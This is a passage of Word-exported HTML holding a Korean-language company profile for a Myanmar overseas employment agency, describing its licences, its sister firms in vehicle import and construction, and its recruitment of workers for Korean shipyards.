Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">사업자등록번호</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\">(295/2004-2005)</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">로</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">영업을</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">시작하였습니다</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\">.</span></p><p class=\"MsoNormal\"><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">뉴코멧무역대행</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\"> 2023</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">년</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">뉴코멧</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">외국인고용업</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">면허를</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">취득하여</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">서비스</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">활동을</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">시작하였습니다</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\">.</span></p><p class=\"MsoNormal\"><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">저희 <strong>뉴코멧</strong></span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\"><strong>&nbsp;</strong></span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\"><strong>해외직업소개회사</strong>&nbsp;</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\">\"New Comet Overseas Employment Agency\"</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">는자매</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">회사인&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;mso-spacerun:yes;\" xml:lang=\"KO\" lang=\"KO\"> </span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\"><strong>제야뉴코멧 자동차 판매 및 서비스 회사</strong></span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\">, </span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\"><strong>뉴코멧회사</strong>등</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">기업들과</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">협력하여</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">경제통상자원부에서&nbsp;</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;mso-spacerun:yes;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">차량</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">수입허가를</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">신청했고</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">각종</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">상용트럭</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\">, </span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">관광</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">산업 및</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">운송에</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">사용되는</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">다양한</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">유형의</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">버스</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">및</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">기계를</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">일본에서</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">직접</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">구매 판매하는</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">사업을</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\"> 25</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">년</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">이상&nbsp;</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;mso-spacerun:yes;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">종사해</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">왔고 나라를 위한 정한 세금들을 냈습니다</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\">. </span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">게다가</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\">100 </span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">명 이상의</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">직원에게</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">고용</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">기회를</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">제공했습니다</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\">.</span></p><p class=\"MsoNormal\"><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">또한</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">쌍둥이</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">회사인</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\"><strong>뉴코멧건설 회사</strong></span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\"><strong>, </strong></span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\"><strong>제야슈웨삐띡 건설 회사</strong></span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\"><strong>, </strong></span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\"><strong>아웅네원 회사</strong>들은 정부</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">부처로부터</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">입찰&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\">(tender)</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">을</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">받고</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">건설</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">작업을</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">하는</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">동안</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\"> 200</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">명</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">이상의</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">직원에게</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">고용</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">기회를</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">제공했습니다</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\">.</span></p><p class=\"MsoNormal\"><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">저희&nbsp;</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\">\"</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\"><strong>뉴코멧</strong></span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\"><strong>해외직업소개회사</strong></span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\">\"</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">는 현재에</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">한국</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">조선소들에 일하고 싶은 미얀마</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">각지에서</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">온</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">소수민족</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" 